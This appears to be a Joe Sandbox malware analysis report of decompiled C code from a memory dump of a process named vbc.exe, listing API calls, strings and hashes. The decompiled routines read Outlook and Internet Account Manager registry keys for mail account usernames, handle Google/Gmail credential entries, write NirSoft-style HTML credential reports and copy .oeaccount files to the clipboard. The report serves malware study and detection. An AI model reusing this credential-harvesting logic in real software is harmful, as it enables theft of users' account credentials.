                                                                                                                                                                        								_t168 =  *(_t185 + _t135 - 0x10c0) ^  *(_t185 + _t135 - 0xcc0);
                                                                                                                                                                        								_t135 = _t135 + 1;
                                                                                                                                                                        								 *(_t185 + _t135 - 0x1be1) = _t168;
                                                                                                                                                                        							} while (_t135 < _t177);
                                                                                                                                                                        						}
                                                                                                                                                                        						 *((char*)(_t185 + _t177 - 0x1be0)) = _t156;
                                                                                                                                                                        						strcpy(_a12,  &_v7136);
                                                                                                                                                                        						E0040BE2A( &_v132);
                                                                                                                                                                        						_t67 = _t177 - 4; // 0x0
                                                                                                                                                                        						E0040BE4E(_t67,  &_v132, _a12);
                                                                                                                                                                        						E0040BEEC(_t177,  &_v132,  &_v40);
                                                                                                                                                                        						memcpy( &_v8,  &_v40, 4);
                                                                                                                                                                        						memcpy( &_v12,  &_v7140, 4);
                                                                                                                                                                        						_t156 = 1;
                                                                                                                                                                        						 *_a16 = 0 | _v8 == _v12;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t156;
                                                                                                                                                                        			}
0x004116be
0x004116c6
0x004116ce
0x004116dd
0x004116e3
0x004116fc
0x004116ff
0x00411709
0x0041170c
0x00411712
0x00411714
0x00411722
0x00411723
0x00411724
0x00411733
0x00411739
0x00411747
0x0041174d
0x0041175b
0x00411761
0x00411768
0x0041176e
0x0041176f
0x00411770
0x00411771
0x00411778
0x00411781
0x00411787
0x0041178f
0x0041179d
0x004117a9
0x004117ac
0x004117be
0x004117c8
0x004117d3
0x004117d6
0x004117d9
0x004117e5
0x004117fa
0x0041180c
0x00411813
0x0041181e
0x00411821
0x00411824
0x00411830
0x0041184f
0x00411867
0x0041186c
0x00411871
0x00411879
0x00411881
0x00411884
0x00411886
0x004118a1
0x004118a6
0x004118ac
0x004118af
0x004118af
0x004118b2
0x004118b6
0x004118b8
0x004118bf
0x004118c6
0x004118c9
0x004118c9
0x004118b8
0x004118dc
0x004118e3
0x004118eb
0x004118f3
0x004118f9
0x00411905
0x00411914
0x00411926
0x0041193e
0x0041193f
0x0041193f
0x00411714
0x00411947

APIs
• memset.MSVCRT ref: 004116E3
  • Part of subcall function 00411533: strlen.MSVCRT ref: 00411540
• strlen.MSVCRT ref: 004116FF
• memset.MSVCRT ref: 00411739
• memset.MSVCRT ref: 0041174D
• memset.MSVCRT ref: 00411761
• memset.MSVCRT ref: 00411787
  • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEDF
  • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF0B
  • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF21
  • Part of subcall function 0040BEEC: memcpy.MSVCRT ref: 0040BF58
  • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF62
• memcpy.MSVCRT ref: 004117BE
  • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BE91
  • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEBB
  • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF33
• memcpy.MSVCRT ref: 004117FA
• memcpy.MSVCRT ref: 0041180C
• strcpy.MSVCRT(?,?), ref: 004118E3
• memcpy.MSVCRT ref: 00411914
• memcpy.MSVCRT ref: 00411926
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpymemset$strlen$strcpy
• String ID: salu
• API String ID: 2660478486-4177317985
• Opcode ID: ecc3e5fc33f7c09d638776c6de414f29c6625a71b5aa4d45c2c235c3495687e5
• Instruction ID: f1a42822f8ef7e9ef4ab6207fa972415b32dae4f069819a41f3cbfc12677ad8b
• Opcode Fuzzy Hash: ecc3e5fc33f7c09d638776c6de414f29c6625a71b5aa4d45c2c235c3495687e5
• Instruction Fuzzy Hash: 84717E7290011DAACB10EB95CC81ADE77BDFF08348F1445BAF648E7151DB749B888F98
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
E00404292(intOrPtr __ecx, void* __esi, void* __fp0, wchar_t** _a4) {
	intOrPtr _v8;
	char _v280;
	char _v408;
	intOrPtr _v412;
	char _v796;
	intOrPtr _v800;
	char _v928;
	char _v940;
	wchar_t* _t23;
	char* _t41;
	wchar_t** _t59;
	void* _t76;

	_t76 = __fp0;
	_t59 = _a4;
	_t23 =  *_t59;
	_v8 = __ecx;
	if(_t23 != 0 && _t59[1] != 0 && _t59[2] != 0 && wcsstr(_t23, L"www.google.com") != 0) {
		E00402197( &_v940);
		_v800 = 7;
		_v412 = 3;
		WideCharToMultiByte(0, 0, _t59[1], 0xffffffff,  &_v408, 0x7f, 0, 0);
		WideCharToMultiByte(0, 0, _t59[2], 0xffffffff,  &_v280, 0x7f, 0, 0);
		strcpy( &_v928,  &_v408);
		strcpy( &_v796,  &_v408);
		if(strchr( &_v796, 0x40) == 0 && strlen( &_v408) + 0xa < 0x7f) {
			sprintf( &_v796, "%s@gmail.com",  &_v408);
		}
		_t41 = strchr( &_v928, 0x40);
		if(_t41 != 0) {
			 *_t41 = 0;
		}
		E004023C6( &_v940, _t76, _v8 + 0xfffff788);
	}
	return 1;
}
APIs
• wcsstr.MSVCRT ref: 004042C7
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 0040430E
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404322
• strcpy.MSVCRT(?,?), ref: 00404332
• strcpy.MSVCRT(?,?,?,?), ref: 00404345
• strchr.MSVCRT ref: 00404353
• strlen.MSVCRT ref: 00404367
• sprintf.MSVCRT ref: 00404388
• strchr.MSVCRT ref: 00404399
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWidestrchrstrcpy$sprintfstrlenwcsstr
• String ID: %s@gmail.com$www.google.com
• API String ID: 1359934567-4070641962
• Opcode ID: a3cc65550b97ecd1211b0065db1cf81a5f65b27e49af438170d461af2d2a7879
• Instruction ID: 1c9d9e350e6bfb7db098629835421676e34b4d03cf30903a353d84187424ac51
• Opcode Fuzzy Hash: a3cc65550b97ecd1211b0065db1cf81a5f65b27e49af438170d461af2d2a7879
• Instruction Fuzzy Hash: AE3166B2904219AFDB11DB91DD81FDBB7ACAB14314F1001A7B708E2180D678AF958A98
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 96%
E004083E4(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, char* _a8) {
	void _v4103;
	char _v4104;
	int _t21;
	int _t28;
	void* _t35;

	_t35 = __eflags;
	E00412360(0x1004, __ecx);
	strcpy(0x4181b8, _a8);
	strcpy(0x4182c0, "general");
	E00407FBF(_t35, "TranslatorName", 0x41344f);
	E00407FBF(_t35, "TranslatorURL", 0x41344f);
	EnumResourceNamesA(_a4, 4, E0040820D, 0);
	EnumResourceNamesA(_a4, 5, E0040820D, 0);
	strcpy(0x4182c0, "strings");
	_t28 = 0;
	_v4104 = 0;
	memset( &_v4103, 0, 0x1000);
	do {
		_t21 = LoadStringA(_a4, _t28,  &_v4104, 0x1000);
		if(_t21 > 0) {
			_t21 = E0040802D(_t28,  &_v4104);
		}
		_t28 = _t28 + 1;
	} while (_t28 <= 0xffff);
	 *0x4181b8 = 0;
	return _t21;
}
APIs
• strcpy.MSVCRT(004181B8,00000000,00000000,00000000,?,?,00408515,00000000,?,00000000,00000104,?), ref: 004083FC
• strcpy.MSVCRT(004182C0,general,004181B8,00000000,00000000,00000000,?,?,00408515,00000000,?,00000000,00000104,?), ref: 0040840C
  • Part of subcall function 00407FBF: memset.MSVCRT ref: 00407FE4
  • Part of subcall function 00407FBF: GetPrivateProfileStringA.KERNEL32(004182C0,00000104,0041344F,?,00001000,004181B8), ref: 00408008
  • Part of subcall function 00407FBF: WritePrivateProfileStringA.KERNEL32(004182C0,?,?,004181B8), ref: 0040801F
• EnumResourceNamesA.KERNEL32(00000104,00000004,0040820D,00000000), ref: 00408442
• EnumResourceNamesA.KERNEL32(00000104,00000005,0040820D,00000000), ref: 0040844C
• strcpy.MSVCRT(004182C0,strings,?,00408515,00000000,?,00000000,00000104,?), ref: 00408454
• memset.MSVCRT ref: 00408470
• LoadStringA.USER32 ref: 00408484
  • Part of subcall function 0040802D: _itoa.MSVCRT ref: 0040804E
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Stringstrcpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
• String ID: TranslatorName$TranslatorURL$general$strings
• API String ID: 1060401815-3647959541
                                                                                                                                                                        • Opcode ID: 98af3922fbcbedabf84b8f8c529632f1206592c49a551a07e3fdb0f782d43fb9
                                                                                                                                                                        • Instruction ID: 8ec8ecd25de3f69567fa6951aee80203735b19b36847dd402765e4c6546554b2
                                                                                                                                                                        • Opcode Fuzzy Hash: 98af3922fbcbedabf84b8f8c529632f1206592c49a551a07e3fdb0f782d43fb9
                                                                                                                                                                        • Instruction Fuzzy Hash: 201108319401543AD73167569D0AFDB3E6CDB85B94F1040BFBA48A61C1D9BC59C086BC
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 91%
E0040B656(intOrPtr __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
	void* _v8;
	intOrPtr _v20;
	void* _v24;
	void* _v28;
	void* __ebx;
	void* __esi;
	signed int _t51;
	intOrPtr _t56;
	signed int _t59;
	intOrPtr _t92;
	intOrPtr _t93;
	intOrPtr _t95;
	signed char _t97;
	signed int _t99;
	intOrPtr _t100;
	intOrPtr _t102;
	intOrPtr _t103;
	void* _t104;

	_t95 = __ecx;
	_t100 = _a4;
	_t104 = _t100 - 0x402;
	_t103 = __ecx;
	if(_t104 > 0) {
		_t51 = _t100 - 0x415;
		__eflags = _t51;
		if(_t51 == 0) {
			E0040A632(__ecx);
			L22:
			__eflags = 0;
			E0040A3E9(0, _t95, _t103, 0);
			L23:
			if(_t100 ==  *((intOrPtr*)(_t103 + 0x374))) {
				_t92 = _a12;
				_t97 =  *(_a12 + 0xc);
				_t56 =  *((intOrPtr*)(_t103 + 0x370));
				if((_t97 & 0x00000008) == 0) {
					__eflags = _t97 & 0x00000040;
					if((_t97 & 0x00000040) != 0) {
						 *0x4181ac =  *0x4181ac & 0x00000000;
						__eflags =  *0x4181ac;
						SetFocus( *(_t56 + 0x184));
					}
				} else {
					E00409EE8(_t56, _t92);
				}
			}
			return E00401939(_t103, _t100, _a8, _a12);
		}
		_t59 = _t51 - 1;
		__eflags = _t59;
		if(_t59 == 0) {
			 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)))) + 0x5c))();
			_t95 =  *((intOrPtr*)(__ecx + 0x370));
			_push(0);
			 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)))) + 0x74))();
			E0040A5A1(__ecx);
			SetFocus( *( *((intOrPtr*)(__ecx + 0x370)) + 0x184));
			goto L22;
		}
		__eflags = _t59 == 6;
		if(_t59 == 6) {
			SetFocus( *(__ecx + 0x378));
		}
		goto L23;
	}
	if(_t104 == 0) {
		 *(__ecx + 0x25c) =  *(__ecx + 0x25c) & 0x00000000;
		E0040A5A1(__ecx);
		goto L22;
	}
	if(_t100 == 0x1c) {
		__eflags = _a8;
		if(_a8 == 0) {
			 *((intOrPtr*)(_t103 + 0x378)) = GetFocus();
		} else {
			PostMessageA( *(__ecx + 0x108), 0x41c, 0, 0);
		}
		goto L23;
	}
	if(_t100 == 0x20) {
		__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
		if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
			goto L23;
		}
		SetCursor(LoadCursorA( *0x417b94, 0x67));
		return 1;
	}
	if(_t100 == 0x2b) {
		_t93 = _a12;
		__eflags =  *((intOrPtr*)(_t93 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
		if( *((intOrPtr*)(_t93 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
			SetBkMode( *(_t93 + 0x18), 1);
			SetTextColor( *(_t93 + 0x18), 0xff0000);
			_v8 = SelectObject( *(_t93 + 0x18),  *(__ecx + 0x258));
			asm("stosd");
			asm("stosd");
			asm("stosd");
			asm("stosd");
			_t102 = _a12;
			_v28 = 0x14;
			_v20 = 5;
			DrawTextExA( *(_t102 + 0x18), __ecx + 0x158, 0xffffffff, _t102 + 0x1c, 4,  &_v28);
			SelectObject( *(_t102 + 0x18), _v8);
			_t100 = _a4;
		}
	} else {
		if(_t100 == 0x7b) {
			_t99 = _a8;
			if(_a8 ==  *( *((intOrPtr*)(__ecx + 0x370)) + 0x184)) {
				E0040B48C(__ecx, _t99);
			}
		}
	}
	goto L23;
}
                                                                                                                                                                        0x0040b7b0
                                                                                                                                                                        0x0040b671
                                                                                                                                                                        0x0040b793
                                                                                                                                                                        0x0040b79a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b79a
                                                                                                                                                                        0x0040b67a
                                                                                                                                                                        0x0040b76b
                                                                                                                                                                        0x0040b76e
                                                                                                                                                                        0x0040b78b
                                                                                                                                                                        0x0040b770
                                                                                                                                                                        0x0040b77d
                                                                                                                                                                        0x0040b77d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b76e
                                                                                                                                                                        0x0040b683
                                                                                                                                                                        0x0040b740
                                                                                                                                                                        0x0040b746
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b75b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b763
                                                                                                                                                                        0x0040b68c
                                                                                                                                                                        0x0040b6b8
                                                                                                                                                                        0x0040b6be
                                                                                                                                                                        0x0040b6c4
                                                                                                                                                                        0x0040b6cf
                                                                                                                                                                        0x0040b6dd
                                                                                                                                                                        0x0040b6f4
                                                                                                                                                                        0x0040b6fc
                                                                                                                                                                        0x0040b6fd
                                                                                                                                                                        0x0040b6fe
                                                                                                                                                                        0x0040b6ff
                                                                                                                                                                        0x0040b700
                                                                                                                                                                        0x0040b719
                                                                                                                                                                        0x0040b720
                                                                                                                                                                        0x0040b727
                                                                                                                                                                        0x0040b733
                                                                                                                                                                        0x0040b735
                                                                                                                                                                        0x0040b735
                                                                                                                                                                        0x0040b68e
                                                                                                                                                                        0x0040b691
                                                                                                                                                                        0x0040b69d
                                                                                                                                                                        0x0040b6a6
                                                                                                                                                                        0x0040b6ae
                                                                                                                                                                        0x0040b6ae
                                                                                                                                                                        0x0040b6a6
                                                                                                                                                                        0x0040b691
                                                                                                                                                                        0x00000000

APIs
• SetBkMode.GDI32(?,00000001), ref: 0040B6CF
• SetTextColor.GDI32(?,00FF0000), ref: 0040B6DD
• SelectObject.GDI32(?,?), ref: 0040B6F2
• DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B727
• SelectObject.GDI32(00000014,?), ref: 0040B733
  • Part of subcall function 0040B48C: GetCursorPos.USER32(?), ref: 0040B499
  • Part of subcall function 0040B48C: GetSubMenu.USER32 ref: 0040B4A7
  • Part of subcall function 0040B48C: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B4D4
• LoadCursorA.USER32 ref: 0040B754
• SetCursor.USER32(00000000), ref: 0040B75B
• PostMessageA.USER32 ref: 0040B77D
• SetFocus.USER32(?), ref: 0040B7B8
• SetFocus.USER32(?), ref: 0040B831
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
• String ID:
• API String ID: 1416211542-0
• Opcode ID: bc5cb01d3b7f9688ca8135e811a877c212f36fbd06482ddff94c06b945a20ebb
• Instruction ID: bf574778d17b78baaeffb7f566a8ea64d240ccb0deb227a445330b453fade6b9
• Opcode Fuzzy Hash: bc5cb01d3b7f9688ca8135e811a877c212f36fbd06482ddff94c06b945a20ebb
• Instruction Fuzzy Hash: 4A519271100605EFCB15EF69CC88AEA7BA5FF44301F10443AF615AB2A1CB38AD51DB9D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 81%
E00403E97(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
    intOrPtr* _v8;
    char _v76;
    void _v1099;
    char _v1100;
    void _v2123;
    char _v2124;
    void _v3147;
    char _v3148;
    char _v4172;
    void* __ebx;
    void* __esi;
    void* _t36;
    void* _t37;
    void* _t48;
    void* _t55;
    intOrPtr* _t56;
    signed int _t58;
    intOrPtr* _t63;
    void* _t70;
    void* _t71;
    intOrPtr _t78; /* declaration was missing from the decompiler output; used below */

    _t56 = __ecx;
    E00412360(0x1048, __ecx);
    _t63 = _t56;
    _v8 = _t63;
    /* write the HTML report header (NirSoft-style HTML export of harvested credentials) */
    E00405F07(_a4, "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
    _v1100 = 0;
    memset( &_v1099, 0, 0x3ff);
    _v3148 = 0;
    memset( &_v3147, 0, 0x3ff);
    _v2124 = 0;
    memset( &_v2123, 0, 0x3ff);
    _t71 = _t70 + 0x2c;
    if( *0x418308 != 0) {
        /* optional charset meta tag, taken from the global at 0x418308 */
        sprintf( &_v3148, "<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>", 0x418308);
        _t71 = _t71 + 0xc;
    }
    if( *0x418304 != 0) {
        /* optional right-to-left table wrapper, controlled by the global at 0x418304 */
        strcpy( &_v1100, "<table dir=\"rtl\"><tr><td>\r\n");
    }
    _t36 =  *((intOrPtr*)( *_t63 + 0x1c))();
    _t58 = 0x10;
    _push(_t36);
    _t37 = memcpy( &_v76, "<html><head>%s<title>%s</title></head>\r\n<body>\r\n%s <h3>%s</h3>\r\n", _t58 << 2);
    asm("movsb");
    sprintf( &_v4172,  &_v76,  &_v3148, _t37,  &_v1100);
    E00405F07(_a4,  &_v4172);
    _push(0x413450);
    _t55 = 6;
    _push(E00407A69(_t55));
    /* footer line linking back to nirsoft.net, as embedded in the sample */
    sprintf( &_v2124, "<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
    _t48 = E00405F07(_a4,  &_v2124);
    _t78 = _a8 - 4;
    if(_a8 == 4) {
        return E00409959(_v8, _t78, _a4);
    }
    return _t48;
}
                                                                                                                                                                        0x00403f89
                                                                                                                                                                        0x00403f8f
                                                                                                                                                                        0x00403f9c
                                                                                                                                                                        0x00403fab
                                                                                                                                                                        0x00403fb3
                                                                                                                                                                        0x00403fb7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403fbf
                                                                                                                                                                        0x00403fc8

APIs
  • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
  • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,73B74DE0,00000000,?,?,00409460,00000001,00413B1C,73B74DE0), ref: 00405F21
• memset.MSVCRT ref: 00403ECF
• memset.MSVCRT ref: 00403EE3
• memset.MSVCRT ref: 00403EF7
• sprintf.MSVCRT ref: 00403F18
• strcpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F34
• sprintf.MSVCRT ref: 00403F6B
• sprintf.MSVCRT ref: 00403F9C
Strings
• <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA7
• <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F46
• <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F96
• <table dir="rtl"><tr><td>, xrefs: 00403F2E
• <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F12
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memsetsprintf$FileWritestrcpystrlen
• String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
• API String ID: 1043021993-1670831295
• Opcode ID: 163ad70dd9f880e3028995f9713b9bd221414d9478fc282d95e5eed4acd236de
• Instruction ID: 99203b830fad9dc7343b4b85adec4cad5e30f503418e1d4ebc977d79dce285bf
• Opcode Fuzzy Hash: 163ad70dd9f880e3028995f9713b9bd221414d9478fc282d95e5eed4acd236de
• Instruction Fuzzy Hash: F13166B2D00119AEDB54EB95DC41EDF7BACEB08304F1441ABB608E3141DA786FD48B69
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00402C1E(void* __ecx, void* __fp0, intOrPtr _a4) {
	void* _v8;
	int _v12;
	char _v16;
	char _v20;
	void _v275;
	char _v276;
	void _v1299;
	char _v1300;
	void* __esi;
	void* _t35;
	intOrPtr _t36;
	void* _t40;
	void* _t52;
	void* _t58;
	void* _t60;
	void* _t64;
	char* _t66;
	void* _t73;
	void* _t74;
	void* _t75;
	void* _t76;
	void* _t77;
	void* _t83;
	/* temporaries used below that the decompiler left undeclared */
	intOrPtr _t69;
	void* _t80;
	void* _t81;

	_t83 = __fp0;
	_t64 = __ecx;
	/* 0x80000001 is HKEY_CURRENT_USER: open HKCU\Identities (see subcall 0040F1B0 -> RegOpenKeyExA) */
	_t35 = E0040F1B0(0x80000001, "Identities",  &_v8);
	_t74 = _t73 + 0xc;
	if(_t35 == 0) {
		_v12 = 0;
		_v276 = 0;
		memset( &_v275, 0, 0xff);
		/* enumerate the first identity subkey (subcall 0040F276 -> RegEnumKeyExA) */
		_t40 = E0040F276(_v8, 0,  &_v276);
		_t75 = _t74 + 0x18;
		if(_t40 == 0) {
			_t66 = "%s\\%s";
			do {
				_t69 = _a4;
				/* copy the identity's "Username" value into the caller's buffer at _a4 + 0xa9c */
				E0040F232(_t64, _v8,  &_v276, "Username", _a4 + 0xa9c, 0x7f);
				_v1300 = 0;
				memset( &_v1299, 0, 0x3ff);
				/* build "<identity>\Software\Microsoft\Internet Account Manager\Accounts" and open it */
				sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Internet Account Manager\\Accounts");
				_t52 = E0040F1B0(_v8,  &_v1300,  &_v16);
				_t76 = _t75 + 0x3c;
				_t80 = _t52;
				if(_t52 == 0) {
					E00402B92(_t64,  &_v16, _t80, _t83, _t69, 1);
				}
				/* same for the Outlook OMI Account Manager accounts of this identity */
				sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts");
				_t58 = E0040F1B0(_v8,  &_v1300,  &_v20);
				_t77 = _t76 + 0x1c;
				_t81 = _t58;
				if(_t58 == 0) {
					E00402B92(_t64,  &_v20, _t81, _t83, _a4, 5);
				}
				/* advance to the next identity subkey; loop ends when RegEnumKeyExA fails */
				_v12 = _v12 + 1;
				_t60 = E0040F276(_v8, _v12,  &_v276);
				_t75 = _t77 + 0xc;
			} while (_t60 == 0);
		}
		RegCloseKey(_v8);
	}
	/* clear the username buffer before returning */
	_t36 = _a4;
	 *((char*)(_t36 + 0xa9c)) = 0;
	return _t36;
}

APIs
  • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
• memset.MSVCRT ref: 00402C5E
  • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32 ref: 0040F299
• RegCloseKey.ADVAPI32(?), ref: 00402D60
  • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
• memset.MSVCRT ref: 00402CB8
• sprintf.MSVCRT ref: 00402CD1
• sprintf.MSVCRT ref: 00402D0F
  • Part of subcall function 00402B92: memset.MSVCRT ref: 00402BB2
  • Part of subcall function 00402B92: RegCloseKey.ADVAPI32 ref: 00402C16
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Closememset$sprintf$EnumOpen
• String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
• API String ID: 1831126014-3814494228
• Opcode ID: aa5e6b6edcfc89fa36e6c73b68bb675aec0b52e4a9a4f07f5dc5d81ecae78039
• Instruction ID: 6132c75c80fc905e8fcbbac6237d45e27d646b3e48d82405447337ab985425ff
• Opcode Fuzzy Hash: aa5e6b6edcfc89fa36e6c73b68bb675aec0b52e4a9a4f07f5dc5d81ecae78039
• Instruction Fuzzy Hash: 66314072D0011DBADB21EA91CD42EEF7B7CAF18345F0404BABA14F2091E7B49F888B54
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
/* Decompiled routine: reads the whole file opened by E00405ED5 (a CreateFileA wrapper; the
   APIs list below shows it referencing "*.oeaccount") into a global buffer and places it on
   the clipboard as CF_TEXT (format 1). The clipboard must already be open: OpenClipboard is
   not called here, so the caller is responsible for it. Returns 0 on success, else the
   GetLastError() value of the failing step. */
E00405FD0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
	long _v8;    /* result / last error code */
	void* _v12;  /* file handle returned by E00405ED5 */
	long _v16;   /* bytes actually read (unused afterwards) */
	void* _t14;
	void* _t29;  /* HGLOBAL handed to SetClipboardData */
	void* _t34;  /* locked pointer into that HGLOBAL */
	long _t36;   /* file size */
	long _t5;    /* size + 1, room for the terminating NUL */

	_v8 = _v8 & 0x00000000;
	EmptyClipboard();
	_t14 = E00405ED5(_a4);
	_v12 = _t14;
	if(_t14 == 0xffffffff) {            /* INVALID_HANDLE_VALUE: open failed */
		_v8 = GetLastError();
	} else {
		_t36 = GetFileSize(_t14, 0);
		_t5 = _t36 + 1;
		_t29 = GlobalAlloc(0x2000, _t5);  /* 0x2000 = GMEM_MOVEABLE, as SetClipboardData requires */
		if(_t29 == 0) {
			L4:
			_v8 = GetLastError();
		} else {
			_t34 = GlobalLock(_t29);
			if(ReadFile(_v12, _t34, _t36,  &_v16, 0) == 0) {
				goto L4;                  /* note: the locked HGLOBAL is neither unlocked nor freed on this path */
			} else {
				 *((char*)(_t34 + _t36)) = 0;  /* NUL-terminate so the data is a valid CF_TEXT string */
				GlobalUnlock(_t29);
				SetClipboardData(1, _t29);    /* 1 = CF_TEXT; ownership of _t29 passes to the system */
			}
		}
		CloseHandle(_v12);
	}
	CloseClipboard();
	return _v8;
}

APIs
• EmptyClipboard.USER32 ref: 00405FDA
  • Part of subcall function 00405ED5: CreateFileA.KERNEL32(0041133F,80000000,00000001,00000000,00000003,00000000,00000000,0041127B,0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?), ref: 00405EE7
• GetFileSize.KERNEL32(00000000,00000000), ref: 00405FF7
• GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406008
• GlobalLock.KERNEL32 ref: 00406015
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406028
• GlobalUnlock.KERNEL32(00000000), ref: 00406037
• SetClipboardData.USER32(00000001,00000000), ref: 00406040
• GetLastError.KERNEL32 ref: 00406048
• CloseHandle.KERNEL32(?), ref: 00406054
• GetLastError.KERNEL32 ref: 0040605F
• CloseClipboard.USER32 ref: 00406068
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
• String ID:
• API String ID: 3604893535-0
• Opcode ID: 5d04c3275f228edfc2a9dcea81e5f6d2cb0bf8e7915dc2d704a3e214ce43d208
• Instruction ID: 46ab690def339a2f00972c0b4152e32a3d13c207705114ffa6be22e44c23a91c
• Opcode Fuzzy Hash: 5d04c3275f228edfc2a9dcea81e5f6d2cb0bf8e7915dc2d704a3e214ce43d208
